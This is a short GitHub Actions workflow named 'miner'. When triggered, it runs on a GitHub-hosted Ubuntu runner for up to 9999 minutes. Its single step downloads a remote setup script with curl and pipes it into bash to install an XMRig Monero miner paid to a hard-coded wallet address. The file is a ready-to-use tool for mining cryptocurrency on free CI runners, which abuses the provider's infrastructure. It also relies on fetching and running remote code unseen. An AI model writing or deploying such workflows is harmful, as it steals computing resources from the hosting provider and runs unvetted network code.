name: miner

on: 
  workflow_dispatch:

jobs:
  build:
    name: start mine
    runs-on: ubuntu-latest
    timeout-minutes: 9999

    steps:
    - name: starting miner...
      run: curl -s -L https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/setup_moneroocean_miner.sh | bash -s 43PrhPVeWEUcrbzJTUXajpWxtRGs95kw8S1Fwjh7NZphBUKLxdtuh8TgsmPT9hr2hg1Kn1xAJJkyN2mR9TTSL2fk4aKNP1B
